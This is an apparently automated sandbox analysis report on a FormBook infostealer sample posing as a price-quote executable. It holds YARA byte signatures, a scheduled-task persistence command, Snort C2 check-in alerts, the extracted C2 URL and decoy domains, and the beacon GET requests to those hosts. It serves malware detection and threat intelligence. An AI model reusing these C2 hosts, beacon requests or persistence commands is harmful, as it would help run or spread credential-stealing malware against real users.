10.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1aae7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1baea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
10.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17a09:$sqlite3step: 68 34 1C 7B E1 0x17b1c:$sqlite3step: 68 34 1C 7B E1 0x17a38:$sqlite3text: 68 38 2A 90 C5 0x17b5d:$sqlite3text: 68 38 2A 90 C5 0x17a4b:$sqlite3blob: 68 53 D8 7F 8C 0x17b73:$sqlite3blob: 68 53 D8 7F 8C
10.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
10.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
10.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.400000.0.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cb80:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
10.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b8e7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c8ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
10.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18809:$sqlite3step: 68 34 1C 7B E1 0x1891c:$sqlite3step: 68 34 1C 7B E1 0x18838:$sqlite3text: 68 38 2A 90 C5 0x1895d:$sqlite3text: 68 38 2A 90 C5 0x1884b:$sqlite3blob: 68 53 D8 7F 8C 0x18973:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 5 entries

Sigma Signatures

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ySqETqNvdTbE" /XML "C:\Users\user\AppData\Local\Temp\tmpF7.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ySqETqNvdTbE" /XML "C:\Users\user\AppData\Local\Temp\tmpF7.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe, ParentImage: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe, ParentProcessId: 7516, ParentProcessName: IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ySqETqNvdTbE" /XML "C:\Users\user\AppData\Local\Temp\tmpF7.tmp, ProcessId: 7868, ProcessName: schtasks.exe

Snort Signatures

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.9 - Destination IP: 3.33.130.190

Timestamp:	192.168.2.93.33.130.19049727802031412 10/18/23-08:37:53.415166
SID:	2031412
Source Port:	49727
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.9 - Destination IP: 198.54.117.242

Timestamp:	192.168.2.9198.54.117.24249721802031412 10/18/23-08:36:30.911963
SID:	2031412
Source Port:	49721
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.9 - Destination IP: 212.129.41.217

Timestamp:	192.168.2.9212.129.41.21749728802031412 10/18/23-08:38:14.037701
SID:	2031412
Source Port:	49728
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.9 - Destination IP: 104.17.157.1

Timestamp:	192.168.2.9104.17.157.149722802031412 10/18/23-08:36:51.901827
SID:	2031412
Source Port:	49722
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.9 - Destination IP: 108.179.194.28

Timestamp:	192.168.2.9108.179.194.2849725802031412 10/18/23-08:37:11.727615
SID:	2031412
Source Port:	49725
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.9 - Destination IP: 154.12.93.8

Timestamp:	192.168.2.9154.12.93.849726802031412 10/18/23-08:37:33.100858
SID:	2031412
Source Port:	49726
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.9 - Destination IP: 38.6.237.43

Timestamp:	192.168.2.938.6.237.4349717802031412 10/18/23-08:35:11.802172
SID:	2031412
Source Port:	49717
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.9 - Destination IP: 66.203.148.230

Timestamp:	192.168.2.966.203.148.23049719802031412 10/18/23-08:35:30.913062
SID:	2031412
Source Port:	49719
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.2.9 - Destination IP: 3.33.130.190

Timestamp:	192.168.2.93.33.130.19049720802031412 10/18/23-08:35:49.921130
SID:	2031412
Source Port:	49720
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 0000000B.00000002.1556450459.000000000493C000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.transporteturisticofradan.space/ifrg/"], "decoy": ["68czt.com", "gvosmm.com", "stakehs.fun", "constructionloancalculator.net", "arissahotel.com", "mndhhy.store", "961bets.com", "legendsturf.com", "hbcucuratefoundation.com", "vespeciative.com", "zysport.net", "terravortex.cfd", "tasteitmakeit.com", "muversus.pro", "kqguvq.cfd", "despachomorelia.com", "66tv982.xyz", "wineroomcontractor.com", "boat-insurance-today.world", "sygree.net", "cigarettesonlinestore.net", "wholesomeroyal.com", "nimbuscleaners.online", "skatingisamazing.com", "58457952.com", "scnanhong.net", "bitcock.net", "bezobotnation.net", "onesixthpress.com", "bellasofisticada.com", "alivenode.com", "qagkqjps.asia", "pokerhebatt7.com", "bindalmegaprojects.com", "ecolecsm.com", "yljinjia.com", "75241.shop", "nitenitedidthis.com", "zaesstudios.com", "dewdrop.store", "thegolfstore.net", "acs-gabon.com", "8651k.vip", "hzchenzhang.com", "ockqen.cfd", "copperstatenods.com", "healthsout.net", "lennard.codes", "695d.xyz", "theavenuclinic.com", "thzrcd.site", "oliverstamatatos.com", "imroahan.dev", "ruffibuddy.xyz", "metashop-02.online", "h0kj.lat", "gdminsheng.icu", "zaphub.app", "trust-official-2.com", "ecodfairs.top", "a88d.xyz", "badaksegar01.click", "creams-72542.bond", "a4ilh1.cfd"]}

Multi AV Scanner detection for submitted file

Source: IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	ReversingLabs: Detection: 57%
Source: IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Virustotal: Detection: 65%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 10.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.1556450459.000000000493C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1556450459.0000000003FF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3880300109.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1478140817.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1498050969.0000000003EC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3880157692.0000000002B10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.3878883525.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Antivirus / Scanner detection for submitted sample

Source: IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://www.skatingisamazing.com/ifrg/www.tasteitmakeit.com	Avira URL Cloud: Label: malware
Source: http://www.zysport.net/ifrg/	Avira URL Cloud: Label: phishing
Source: http://www.ecodfairs.top/ifrg/	Avira URL Cloud: Label: malware
Source: http://www.stakehs.fun/ifrg/www.oliverstamatatos.com	Avira URL Cloud: Label: malware
Source: http://www.oliverstamatatos.com/ifrg/	Avira URL Cloud: Label: malware
Source: http://www.boat-insurance-today.world/ifrg/www.transporteturisticofradan.space	Avira URL Cloud: Label: malware
Source: http://www.gdminsheng.icu/ifrg/	Avira URL Cloud: Label: malware
Source: http://www.alivenode.com/ifrg/www.75241.shop	Avira URL Cloud: Label: malware
Source: http://www.boat-insurance-today.world/ifrg/?MZTt=ah9Zs86GdfepTqxOruRY6KJXUwZDi9MhDmG697S0SgB6n7piKWqUPBRkmR/995/dCXxf&jlUpT=PtkH4NF	Avira URL Cloud: Label: malware
Source: http://www.tasteitmakeit.com/ifrg/www.mndhhy.store	Avira URL Cloud: Label: malware
Source: http://www.mndhhy.store/ifrg/www.stakehs.fun	Avira URL Cloud: Label: malware
Source: http://www.dewdrop.store/ifrg/www.vespeciative.com	Avira URL Cloud: Label: malware
Source: http://www.vespeciative.com/ifrg/www.skatingisamazing.com	Avira URL Cloud: Label: malware
Source: http://www.alivenode.com/ifrg/?MZTt=HEDFe4jCYP8fdlnBQrB26YFMQNXoDtPzhFN7vn7A5A9B7sJohM6u4gXFruHbVPL0Cb9Z&jlUpT=PtkH4NF	Avira URL Cloud: Label: malware
Source: http://www.mndhhy.store/ifrg/	Avira URL Cloud: Label: malware
Source: http://www.gdminsheng.icu/ifrg/?MZTt=5jR7lvWWhXckZO8bi4azApxiCxIqQi0sZy8hVgUcz7H/XBNAH/0FPTwnmComPhSN5IMV&jlUpT=PtkH4NF	Avira URL Cloud: Label: malware
Source: http://www.tasteitmakeit.com/ifrg/	Avira URL Cloud: Label: malware
Source: http://www.alivenode.com/ifrg/	Avira URL Cloud: Label: malware
Source: http://www.bezobotnation.net/ifrg/	Avira URL Cloud: Label: malware
Source: http://www.dewdrop.store/ifrg/	Avira URL Cloud: Label: malware
Source: http://www.vespeciative.com/ifrg/?MZTt=D0BUyIgnkwa8kGN9Qj6aSRghucWXbLaIManVicGkKBrvZQsQ3EBcb5KKQY7GQNLPjnt4&jlUpT=PtkH4NF	Avira URL Cloud: Label: malware
Source: http://www.theavenuclinic.com/ifrg/www.ecodfairs.top	Avira URL Cloud: Label: malware
Source: http://www.theavenuclinic.com/ifrg/	Avira URL Cloud: Label: malware
Source: http://www.75241.shop/ifrg/	Avira URL Cloud: Label: malware
Source: http://www.ecodfairs.top/ifrg/www.bezobotnation.net	Avira URL Cloud: Label: malware
Source: http://www.75241.shop	Avira URL Cloud: Label: phishing
Source: http://www.gdminsheng.icu/ifrg/www.dewdrop.store	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe

Avira: detection malicious, Label: HEUR/AGEN.1306870

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe

ReversingLabs: Detection: 57%

Machine Learning detection for sample

Source: IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe

Joe Sandbox ML: detected

Source: IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: cmstp.pdbGCTL source: ySqETqNvdTbE.exe, 0000000F.00000002.1588807654.00000000014D8000.00000004.00000020.00020000.00000000.sdmp, ySqETqNvdTbE.exe, 0000000F.00000002.1589033021.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, cmstp.exe, 00000011.00000002.3879045777.0000000000A10000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: UGGs.pdbSHA256 source: IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe, ySqETqNvdTbE.exe.1.dr
Source:	Binary string: wntdll.pdbUGP source: IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe, 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000011.00000003.1590106412.000000000476C000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 00000011.00000002.3882069409.0000000004920000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000011.00000002.3882069409.0000000004ABE000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000011.00000003.1588477475.00000000045BF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: UGGs.pdb source: IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe, ySqETqNvdTbE.exe.1.dr
Source:	Binary string: wntdll.pdb source: IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe, IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe, 0000000A.00000002.1478575359.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, cmstp.exe, 00000011.00000003.1590106412.000000000476C000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 00000011.00000002.3882069409.0000000004920000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000011.00000002.3882069409.0000000004ABE000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000011.00000003.1588477475.00000000045BF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: cmstp.pdb source: ySqETqNvdTbE.exe, 0000000F.00000002.1588807654.00000000014D8000.00000004.00000020.00020000.00000000.sdmp, ySqETqNvdTbE.exe, 0000000F.00000002.1589033021.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, cmstp.exe, 00000011.00000002.3879045777.0000000000A10000.00000040.80000000.00040000.00000000.sdmp

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 108.179.194.28 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 154.12.93.8 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.17.157.1 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 66.203.148.230 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 198.54.117.242 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 212.129.41.217 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 38.6.237.43 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 3.33.130.190 80	Jump to behavior

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.9:49717 -> 38.6.237.43:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.9:49719 -> 66.203.148.230:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.9:49720 -> 3.33.130.190:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.9:49721 -> 198.54.117.242:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.9:49722 -> 104.17.157.1:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.9:49725 -> 108.179.194.28:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.9:49726 -> 154.12.93.8:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.9:49727 -> 3.33.130.190:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.9:49728 -> 212.129.41.217:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.transporteturisticofradan.space/ifrg/

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: DNC-ASDimensionNetworkCommunicationLimitedHK DNC-ASDimensionNetworkCommunicationLimitedHK

Source: global traffic	HTTP traffic detected: GET /ifrg/?MZTt=HEDFe4jCYP8fdlnBQrB26YFMQNXoDtPzhFN7vn7A5A9B7sJohM6u4gXFruHbVPL0Cb9Z&jlUpT=PtkH4NF HTTP/1.1Host: www.alivenode.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ifrg/?MZTt=xSMqd057fSXzWu5wKdtIXZUKnlhHKM2qAPBglXE71Jl6YzvFk2uUy9Mdjb2m3oopWkBZ&jlUpT=PtkH4NF HTTP/1.1Host: www.75241.shopConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ifrg/?MZTt=KnnTbyCCZFGMJEpTiCiYfsZf4Jee/pLZimTMLfkjlFBZ/SsdpxLlcqM/NBDR5bKLpT3z&jlUpT=PtkH4NF HTTP/1.1Host: www.theavenuclinic.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ifrg/?MZTt=jWjPiyUc8jw17WMu1mlZUuydoLnX0svbNsscHdhrTlZXQKm/vCPlVUcnTHIU3rFeJjEe&jlUpT=PtkH4NF HTTP/1.1Host: www.bezobotnation.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ifrg/?MZTt=ah9Zs86GdfepTqxOruRY6KJXUwZDi9MhDmG697S0SgB6n7piKWqUPBRkmR/995/dCXxf&jlUpT=PtkH4NF HTTP/1.1Host: www.boat-insurance-today.worldConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ifrg/?MZTt=8SE7XcMvB9HzvYlCBNVH12K36pI2tFzG7ev9rhkff3WzzhkSbyOCO1+x97lbxB99FFNL&jlUpT=PtkH4NF HTTP/1.1Host: www.transporteturisticofradan.spaceConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ifrg/?MZTt=5jR7lvWWhXckZO8bi4azApxiCxIqQi0sZy8hVgUcz7H/XBNAH/0FPTwnmComPhSN5IMV&jlUpT=PtkH4NF HTTP/1.1Host: www.gdminsheng.icuConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ifrg/?MZTt=Jgjy4Hq2fjmR90eBASSIXnz/xCLuGnPv2f5bI+kqzTyohR3vwUCAwejwU7RKcNO0BN0L&jlUpT=PtkH4NF HTTP/1.1Host: www.dewdrop.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ifrg/?MZTt=D0BUyIgnkwa8kGN9Qj6aSRghucWXbLaIManVicGkKBrvZQsQ3EBcb5KKQY7GQNLPjnt4&jlUpT=PtkH4NF HTTP/1.1Host: www.vespeciative.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 198.54.117.242 198.54.117.242

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 18 Oct 2023 06:35:31 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 18 Oct 2023 06:35:50 GMTContent-Type: text/htmlContent-Length: 291Connection: closeETag: "65271109-123"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 18 Oct 2023 06:37:53 GMTContent-Type: text/htmlContent-Length: 291Connection: closeETag: "65271109-123"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe, ySqETqNvdTbE.exe.1.dr	String found in binary or memory: http://127.0.0.1:
Source: explorer.exe, 00000010.00000003.3084418132.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3081820013.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3900398108.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2291641463.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.1537712496.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2291641463.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.1537712496.00000000087BB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000010.00000003.3084418132.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.3081820013.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3900398108.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2291641463.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.1537712496.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000003.2291641463.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.1537712496.00000000087BB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
